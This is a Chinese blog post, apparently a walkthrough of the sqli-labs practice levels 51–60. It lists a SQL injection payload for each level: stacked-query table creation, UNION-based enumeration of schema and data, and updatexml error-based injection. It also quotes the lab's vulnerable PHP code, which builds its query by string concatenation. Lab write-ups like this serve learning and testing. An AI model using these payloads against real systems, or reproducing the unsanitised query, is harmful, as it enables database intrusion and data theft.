hu1y40's blog

hu1y40'blog
天堂的穹空遍布地狱之火的颜色,但也是天堂。
  1. 首页
  2. 靶场
  3. sqli-labs
  4. 正文

sqli-labs 51-60

2023年10月7日 573点热度 0人点赞 0条评论

51

堆叠注入

payload:?sort=1%27;%20create%20table%20test51%20like%20users--+

52

堆叠注入

payload:?sort=username;%20create%20table%20test52%20like%20users;

53

堆叠注入

payload:?sort=1%27;%20create%20table%20test53%20like%20users;--+

54

?id=-1%27%20union%20select%201,database(),%273 //查库
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23 //查表
id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='' //查列
?id=-1' union select 1,group_concat(secret_**),3 from ___%23 //查数据

55

payload:?id=1)

56

payload:?id=1')

57

payload:?id=1"

58

好像不能显示union数据,使用报错注入。

payload:?id=-1' and (updatexml(1,concat(0x7e,(select database()),0x7e),1)) --+

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo '<font color= "#00FFFF">';
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo "<br>";
echo 'Your Password : ' .$pass[$row['id']];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}

并没有直接从结果集返回数据,而是创建了一个新array从中取得结果集中的id然后返回数据。

59

payload:?id=-1 and (updatexml(1,concat(0x7e,(select database()),0x7e),1)) --+

60

payload:?id=-2") and (updatexml(1,concat(0x7e,(select database()),0x7e),1))--+

标签: 合集 靶场
最后更新:2023年10月7日

hu1y40

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

razz evil exclaim smile redface biggrin eek confused idea lol mad twisted rolleyes wink cool arrow neutral cry mrgreen drooling persevering
取消回复
文章目录
  • 51
  • 52
  • 53
  • 54
  • 55
  • 56
  • 57
  • 58
  • 59
  • 60

分类目录

  • 0day安全
  • Bypass
  • C++Prime
  • CTF
  • DoS
  • DoS
  • FUZZ
  • iot
  • JSONP
  • MISC
  • MISC
  • PHP伪协议
  • Python
  • REVERSE
  • sqli-labs
  • SQL注入
  • Trick
  • UAF
  • WEB
  • WEB
  • XXE
  • 书籍阅读
  • 二进制
  • 代码阅读
  • 信息搜集
  • 信息泄露
  • 加密与解密
  • 双重释放漏洞
  • 反序列化
  • 命令执行
  • 命令执行
  • 堆溢出
  • 密码学
  • 弱加密
  • 提权漏洞
  • 整数溢出
  • 文件上传
  • 未分类
  • 栈溢出
  • 格式化字符串漏洞
  • 模型
  • 汇编语言
  • 渗透测试
  • 漏洞分析
  • 漏洞利用
  • 漏洞战争
  • 漏洞挖掘
  • 病毒分析
  • 越界读取
  • 路径遍历
  • 逻辑漏洞
  • 配置不当
  • 钓鱼
  • 靶场
最新 热点 随机
最新 热点 随机
加密算法 2023年度总结 RTSPServer StackOverflow Vulnerability FUZZ 总览篇 MP4Box 无限循环漏洞 CVE-2023-40477 Winrar RCE漏洞分析
加密与解密 第3章实验 加密与解密 第8章 上 DES加密 文件上传靶场pass-1-10 bugku cisco CVE-2013-0077 Firefox字符串替换整数溢出漏洞

COPYRIGHT © 2023 hu1y40's blog. ALL RIGHTS RESERVED.

Theme Kratos Made By Seaton Jiang

鄂ICP备2021009673号-1